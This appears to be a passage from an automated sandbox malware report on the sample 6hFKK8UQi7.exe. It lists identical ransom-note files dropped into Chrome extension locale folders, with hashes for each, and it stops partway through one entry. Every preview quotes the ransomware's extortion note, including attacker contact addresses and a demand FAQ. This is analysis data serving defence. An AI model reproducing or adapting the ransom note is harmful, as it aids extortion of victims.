                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fil\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\he\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\it\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ms\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\no\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_BR\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_PT\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
